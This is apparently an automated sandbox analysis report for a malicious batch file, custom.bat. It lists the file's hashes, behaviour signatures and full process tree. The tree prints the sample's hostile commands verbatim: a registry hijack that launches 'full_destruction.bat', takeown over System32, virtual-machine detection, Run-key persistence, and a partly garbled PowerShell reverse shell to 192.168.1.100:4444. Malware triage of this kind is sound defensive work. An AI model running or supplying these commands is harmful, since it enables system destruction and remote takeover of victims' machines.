Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08/09/2024, 06:47

General

  • Target

    custom.bat

  • Size

    4KB

  • MD5

    1c63745d54962d205bb3ae879bea1ed4

  • SHA1

    a832c894a4e2b6d486c48b9ea6ec79d94df9537e

  • SHA256

    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

  • SHA512

    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39

  • SSDEEP

    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Malware Config

Signatures

  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4664
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
        PID:3096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:1940
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
        2⤵
        • Modifies registry class
        PID:1964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3328
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\* /r /d y
          3⤵
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:4732
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:1136
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\Software\Classes\mscfile" /f
        2⤵
        • Modifies registry class
        PID:2484
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:1996
      • C:\Windows\system32\findstr.exe
        findstr /i "VirtualBox"
        2⤵
          PID:404
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          2⤵
          • Gathers system information
          PID:4132
        • C:\Windows\system32\findstr.exe
          findstr /i "VMware"
          2⤵
            PID:4244
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            2⤵
            • Gathers system information
            PID:744
          • C:\Windows\system32\findstr.exe
            findstr /i "Hyper-V"
            2⤵
              PID:1484
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1308
            • C:\Windows\system32\reg.exe
              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
              2⤵
              • Adds Run key to start application
              PID:4584
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\* /r /d y
              2⤵
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:4204

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            42d4b1d78e6e092af15c7aef34e5cf45

            SHA1

            6cf9d0e674430680f67260194d3185667a2bb77b

            SHA256

            c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

            SHA512

            d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            ad24b88758d81706886a3b4a0f8e7573

            SHA1

            907a8d47973c5d1371cc696216cce9002c421311

            SHA256

            9039dfb2a9c4c27da494ed9cf21541a7b021ce310ffeaa89f36703f4642a9bb3

            SHA512

            b94b8c8bf61c76e6a4967cb5859ca0f6f65a6373434594b2a984c18aefa7c7719097a602f6a760fb09902f4ed1f0b33c4662ccfb38a09eba820170d15a830030

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgdm23tg.xww.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

            Filesize

            285B

            MD5

            4577f08330df24a350ff523ec87bf38e

            SHA1

            5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

            SHA256

            5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

            SHA512

            ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

          • memory/2492-0-0x00007FFA11D53000-0x00007FFA11D54000-memory.dmp

            Filesize

            4KB

          • memory/2492-5-0x0000029CFADD0000-0x0000029CFADF2000-memory.dmp

            Filesize

            136KB

          • memory/2492-6-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

            Filesize

            9.9MB

          • memory/2492-10-0x0000029CFAF80000-0x0000029CFAFF6000-memory.dmp

            Filesize

            472KB

          • memory/2492-9-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

            Filesize

            9.9MB

          • memory/2492-28-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

            Filesize

            9.9MB